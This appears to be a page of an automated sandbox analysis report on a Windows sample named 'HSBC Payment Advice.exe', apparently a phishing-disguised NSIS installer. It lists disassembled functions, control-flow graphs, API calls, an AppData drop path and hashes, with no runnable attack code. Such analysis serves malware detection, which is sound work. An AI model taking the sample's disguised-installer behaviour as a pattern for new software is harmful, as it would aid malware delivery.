          • Opcode ID: e049ca0cf4e6168e9f51d2e35110de4cedd2f19c2dadb85783735e7fb38d1665
          • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
          • Opcode Fuzzy Hash: e049ca0cf4e6168e9f51d2e35110de4cedd2f19c2dadb85783735e7fb38d1665
          • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69
          Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 410 405f0a-405f15 411 405f17-405f26 410->411 412 405f28-405f3e 410->412 411->412 413 405f44-405f51 412->413 414 406156-40615c 412->414 413->414 415 405f57-405f5e 413->415 416 406162-40616d 414->416 417 405f63-405f70 414->417 415->414 418 406178-406179 416->418 419 40616f-406173 call 405ee8 416->419 417->416 420 405f76-405f82 417->420 419->418 422 406143 420->422 423 405f88-405fc4 420->423 424 406151-406154 422->424 425 406145-40614f 422->425 426 4060e4-4060e8 423->426 427 405fca-405fd5 GetVersion 423->427 424->414 425->414 430 4060ea-4060ee 426->430 431 40611d-406121 426->431 428 405fd7-405fdb 427->428 429 405fef 427->429 428->429 437 405fdd-405fe1 428->437 434 405ff6-405ffd 429->434 432 4060f0-4060fc call 405e2f 430->432 433 4060fe-40610b call 405ee8 430->433 435 406130-406141 lstrlenW 431->435 436 406123-40612b call 405f0a 431->436 448 406110-406119 432->448 433->448 439 406002-406004 434->439 440 405fff-406001 434->440 435->414 436->435 437->429 443 405fe3-405fe7 437->443 446 406040-406043 439->446 447 406006-40602c call 405db5 439->447 440->439 443->429 444 405fe9-405fed 443->444 444->434 451 406053-406056 446->451 452 406045-406051 GetSystemDirectoryW 446->452 458 406032-40603b call 405f0a 447->458 459 4060cb-4060cf 447->459 448->435 450 40611b 448->450 454 4060dc-4060e2 call 40617c 450->454 456 4060c1-4060c3 451->456 457 406058-406066 GetWindowsDirectoryW 451->457 455 4060c5-4060c9 452->455 454->435 455->454 455->459 456->455 460 406068-406072 456->460 457->456 458->455 459->454 465 4060d1-4060d7 lstrcatW 459->465 462 406074-406077 460->462 463 40608c-4060a2 SHGetSpecialFolderLocation 460->463 462->463 467 406079-406080 462->467 468 4060a4-4060bb SHGetPathFromIDListW CoTaskMemFree 463->468 469 4060bd 463->469 465->454 471 406088-40608a 467->471 468->455 468->469 469->456 471->455 471->463
          APIs
          • GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
          • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
          • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
          • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
          • CoTaskMemFree.OLE32(?), ref: 004060B3
          • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
          • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
          • String ID: eremo$$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
          • API String ID: 900638850-2768416301
          • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
          • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
          • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
          • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E
          Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 701 40653d-406542 702 4065b3-4065d1 701->702 703 406544-406573 701->703 704 406ba9-406bbe 702->704 705 406575-406578 703->705 706 40657a-40657e 703->706 707 406bc0-406bd6 704->707 708 406bd8-406bee 704->708 709 40658a-40658d 705->709 710 406580-406584 706->710 711 406586 706->711 712 406bf1-406bf8 707->712 708->712 713 4065ab-4065ae 709->713 714 40658f-406598 709->714 710->709 711->709 718 406bfa-406bfe 712->718 719 406c1f-406c2b 712->719 717 406780-40679e 713->717 715 40659a 714->715 716 40659d-4065a9 714->716 715->716 720 406613-406641 716->720 723 4067a0-4067b4 717->723 724 4067b6-4067c8 717->724 721 406c04-406c1c 718->721 722 406dad-406db7 718->722 729 4063c1-4063ca 719->729 726 406643-40665b 720->726 727 40665d-406677 720->727 721->719 730 406dc3-406dd6 722->730 728 4067cb-4067d5 723->728 724->728 731 40667a-406684 726->731 727->731 734 4067d7 728->734 735 406778-40677e 728->735 732 4063d0 729->732 733 406dd8 729->733 736 406ddb-406ddf 730->736 739 40668a 731->739 740 4065fb-406601 731->740 741 4063d7-4063db 732->741 742 406517-406538 732->742 743 40647c-406480 732->743 744 4064ec-4064f0 732->744 733->736 753 40675d-406775 734->753 754 406d5f-406d69 734->754 735->717 738 40671c-406726 735->738 747 406d6b-406d75 738->747 748 40672c-4068f5 738->748 760 4065e0-4065f8 739->760 761 406d47-406d51 739->761 749 4066b4-4066ba 740->749 750 406607-40660d 740->750 741->730 756 4063e1-4063ee 741->756 742->704 751 406486-40649f 743->751 752 406d2c-406d36 743->752 745 4064f6-40650a 744->745 746 406d3b-406d45 744->746 759 40650d-406515 745->759 746->730 747->730 748->704 748->729 757 406718 749->757 758 4066bc-4066da 749->758 750->720 750->757 763 4064a2-4064a6 751->763 752->730 753->735 754->730 756->733 764 4063f4-40643a 756->764 757->738 767 4066f2-406704 758->767 768 4066dc-4066f0 758->768 759->742 759->744 760->740 761->730 763->743 769 4064a8-4064ae 763->769 765 406462-406464 764->765 766 40643c-406440 764->766 773 406472-40647a 765->773 774 406466-406470 765->774 770 406442-406445 GlobalFree 766->770 771 40644b-406459 GlobalAlloc 766->771 772 406707-406711 767->772 768->772 775 4064b0-4064b7 769->775 776 4064d8-4064ea 769->776 770->771 771->733 777 40645f 771->777 772->749 778 406713 772->778 773->763 774->773 774->774 779 4064c2-4064d2 GlobalAlloc 775->779 780 4064b9-4064bc GlobalFree 775->780 776->759 777->765 782 406d53-406d5d 778->782 783 406699-4066b1 778->783 779->733 779->776 780->779 782->730 783->749
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
          • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
          • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
          • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
          Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
          Download Yara Rule
          APIs
          • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76702EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76702EE0), ref: 00406236
          • FindClose.KERNEL32(00000000), ref: 00406242
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Find$CloseFileFirst
          • String ID: WB
          • API String ID: 2295610775-2854515933
          • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
          • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
          • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
          • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
          Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
          Download Yara Rule
          APIs
          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
          • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: AddressHandleLibraryLoadModuleProc
          • String ID:
          • API String ID: 310444273-0
          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
          • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
          • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9
          Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
          Download Yara Rule
          APIs
          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
          Strings
          • C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion, xrefs: 004020F5
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CreateInstance
          • String ID: C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion
          • API String ID: 542301482-1482619193
          • Opcode ID: 4dc91b952ef9010e06b2438cbf61f8f91b8319303aa34dd48354e337f9979de1
          • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
          • Opcode Fuzzy Hash: 4dc91b952ef9010e06b2438cbf61f8f91b8319303aa34dd48354e337f9979de1
          • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
          Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
          Download Yara Rule
          APIs
          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040277D
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: FileFindFirst
          • String ID:
          • API String ID: 1974802433-0
          • Opcode ID: 54627da640825ce0e0734af80bc8f22e99ea7fc2d593797114434c8a738431af
          • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
          • Opcode Fuzzy Hash: 54627da640825ce0e0734af80bc8f22e99ea7fc2d593797114434c8a738431af
          • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
          Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 165 4038b2-4038ca call 406252 168 4038cc-4038dc call 405e2f 165->168 169 4038de-403915 call 405db5 165->169 177 403938-403961 call 403b88 call 405a3b 168->177 173 403917-403928 call 405db5 169->173 174 40392d-403933 lstrcatW 169->174 173->174 174->177 183 4039f3-4039fb call 405a3b 177->183 184 403967-40396c 177->184 189 403a09-403a2e LoadImageW 183->189 190 4039fd-403a04 call 405f0a 183->190 184->183 185 403972-40399a call 405db5 184->185 185->183 195 40399c-4039a0 185->195 193 403a30-403a60 RegisterClassW 189->193 194 403aaf-403ab7 call 40140b 189->194 190->189 198 403a66-403aaa SystemParametersInfoW CreateWindowExW 193->198 199 403b7e 193->199 208 403ac1-403acc call 403b88 194->208 209 403ab9-403abc 194->209 196 4039b2-4039be lstrlenW 195->196 197 4039a2-4039af call 405960 195->197 202 4039c0-4039ce lstrcmpiW 196->202 203 4039e6-4039ee call 405933 call 405ee8 196->203 197->196 198->194 205 403b80-403b87 199->205 202->203 207 4039d0-4039da GetFileAttributesW 202->207 203->183 211 4039e0-4039e1 call 40597f 207->211 212 4039dc-4039de 207->212 218 403ad2-403aef ShowWindow LoadLibraryW 208->218 219 403b55-403b56 call 405265 208->219 209->205 211->203 212->203 212->211 221 403af1-403af6 LoadLibraryW 218->221 222 403af8-403b0a GetClassInfoW 218->222 223 403b5b-403b5d 219->223 221->222 224 403b22-403b45 DialogBoxParamW call 40140b 222->224 225 403b0c-403b1c GetClassInfoW RegisterClassW 222->225 227 403b77-403b79 call 40140b 223->227 228 403b5f-403b65 223->228 229 403b4a-403b53 call 403802 224->229 225->224 227->199 228->209 230 403b6b-403b72 call 40140b 228->230 229->205 230->209
          APIs
            • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
            • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
            • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
          • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76703420,00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 00403933
          • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
          • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
          • GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion), ref: 00403A1A
            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
          • RegisterClassW.USER32(00428180), ref: 00403A57
          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
          • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
          • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
          • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
          • RegisterClassW.USER32(00428180), ref: 00403B1C
          • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
          • String ID: "C:\Users\user\Desktop\HSBC Payment Advice.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
          • API String ID: 914957316-666302136
          • Opcode ID: 7591e99d3b1f4cc40b45e62746b81664c4dcf89d43ee78bcadefa554f4fd18e3
          • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
          • Opcode Fuzzy Hash: 7591e99d3b1f4cc40b45e62746b81664c4dcf89d43ee78bcadefa554f4fd18e3
          • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D
          Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 236 403c55-403c67 237 403da8-403db7 236->237 238 403c6d-403c73 236->238 240 403e06-403e1b 237->240 241 403db9-403e01 GetDlgItem * 2 call 40412d SetClassLongW call 40140b 237->241 238->237 239 403c79-403c82 238->239 242 403c84-403c91 SetWindowPos 239->242 243 403c97-403c9a 239->243 245 403e5b-403e60 call 404179 240->245 246 403e1d-403e20 240->246 241->240 242->243 248 403cb4-403cba 243->248 249 403c9c-403cae ShowWindow 243->249 254 403e65-403e80 245->254 251 403e22-403e2d call 401389 246->251 252 403e53-403e55 246->252 255 403cd6-403cd9 248->255 256 403cbc-403cd1 DestroyWindow 248->256 249->248 251->252 267 403e2f-403e4e SendMessageW 251->267 252->245 253 4040fa 252->253 261 4040fc-404103 253->261 259 403e82-403e84 call 40140b 254->259 260 403e89-403e8f 254->260 264 403cdb-403ce7 SetWindowLongW 255->264 265 403cec-403cf2 255->265 262 4040d7-4040dd 256->262 259->260 270 403e95-403ea0 260->270 271 4040b8-4040d1 DestroyWindow KiUserCallbackDispatcher 260->271 262->253 268 4040df-4040e5 262->268 264->261 272 403d95-403da3 call 404194 265->272 273 403cf8-403d09 GetDlgItem 265->273 267->261 268->253 275 4040e7-4040f0 ShowWindow 268->275 270->271 276 403ea6-403ef3 call 405f0a call 40412d * 3 GetDlgItem 270->276 271->262 272->261 277 403d28-403d2b 273->277 278 403d0b-403d22 SendMessageW IsWindowEnabled 273->278 275->253 306 403ef5-403efa 276->306 307 403efd-403f39 ShowWindow KiUserCallbackDispatcher call 40414f EnableWindow 276->307 279 403d30-403d33 277->279 280 403d2d-403d2e 277->280 278->253 278->277 284 403d41-403d46 279->284 285 403d35-403d3b 279->285 283 403d5e-403d63 call 404106 280->283 283->272 287 403d7c-403d8f SendMessageW 284->287 289 403d48-403d4e 284->289 285->287 288 403d3d-403d3f 285->288 287->272 288->283 292 403d50-403d56 call 40140b 289->292 293 403d65-403d6e call 40140b 289->293 304 403d5c 292->304 293->272 302 403d70-403d7a 293->302 302->304 304->283 306->307 310 403f3b-403f3c 307->310 311 403f3e 307->311 312 403f40-403f6e GetSystemMenu EnableMenuItem SendMessageW 310->312 311->312 313 403f70-403f81 SendMessageW 312->313 314 403f83 312->314 315 403f89-403fc7 call 404162 call 405ee8 lstrlenW call 405f0a SetWindowTextW call 401389 313->315 314->315 315->254 324 403fcd-403fcf 315->324 324->254 325 403fd5-403fd9 324->325 326 403ff8-40400c DestroyWindow 325->326 327 403fdb-403fe1 325->327 326->262 329 404012-40403f CreateDialogParamW 326->329 327->253 328 403fe7-403fed 327->328 328->254 330 403ff3 328->330 329->262 331 404045-40409c call 40412d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 329->331 330->253 331->253 336 40409e-4040b1 ShowWindow call 404179 331->336 338 4040b6 336->338 338->262
          APIs
          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
          • ShowWindow.USER32(?), ref: 00403CAE
          • DestroyWindow.USER32 ref: 00403CC2
          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
          • GetDlgItem.USER32(?,?), ref: 00403CFF
          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
          • IsWindowEnabled.USER32(00000000), ref: 00403D1A
          • GetDlgItem.USER32(?,00000001), ref: 00403DC8
          • GetDlgItem.USER32(?,00000002), ref: 00403DD2
